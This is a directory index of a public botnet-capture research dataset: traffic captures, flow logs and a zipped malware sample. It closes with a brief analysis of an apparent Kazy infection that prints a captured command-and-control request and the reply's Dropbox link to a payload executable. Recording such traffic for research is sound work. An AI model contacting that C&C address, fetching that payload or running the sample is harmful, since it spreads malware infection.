Index of /publicDatasets/CTU-Malware-Capture-Botnet-116-1

[ICO]NameLast modifiedSizeDescription

[PARENTDIR]Parent Directory  -  
[   ]2012-05-25-capture-1.biargus2016-12-05 22:30 246K 
[   ]2012-05-25-capture-1.binetflow2016-12-05 22:30 94K 
[   ]2012-05-25-capture-1.capinfos2015-04-09 20:39 713  
[   ]2012-05-25-capture-1.dnstop2016-12-05 22:30 12K 
[TXT]2012-05-25-capture-1.html2015-04-09 20:41 7.3M 
[   ]2012-05-25-capture-1.json2015-04-09 20:41 16M 
[   ]2012-05-25-capture-1.passivedns2016-12-05 22:30 20K 
[   ]2012-05-25-capture-1.pcap2017-04-25 09:29 12M 
[   ]2012-05-25-capture-1.tcpdstat2016-12-05 22:30 2.4K 
[   ]2012-05-25-capture-1.tcpflow-report.pdf2015-02-13 12:50 20K 
[   ]2012-05-25-capture-1.uniargus2016-12-05 22:30 1.2M 
[   ]2012-05-25-capture-1.uninetflow2016-12-05 22:30 515K 
[   ]2012-05-25-capture-1.weblogng2016-06-15 19:07 131K 
[   ]948549816.111111.exe.zip2015-12-16 10:26 285K 
[TXT]README.html2017-04-25 09:30 1.2K 
[TXT]README.md2015-10-07 13:58 1.0K 
[DIR]bro/2017-04-25 09:30 -  
[TXT]fast-flux-dga-first-analysis.txt2017-01-15 13:04 196  

Analysis of probable Kazy

Timeline

Fri May 25 12:59:56 ART 2012

The C&C is not encrypted. - Uses dropbox

POST /cmd.php HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 0
Host: 46.105.227.94

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-7+squeeze9
Content-type: text/html
Transfer-Encoding: chunked
Date: Fri, 25 May 2012 16:01:10 GMT
Server: lighttpd/1.4.28

45
http://dl.dropbox.com/u/60244633/d6026fff2e326a77b1afd69a60afe42c.exe
0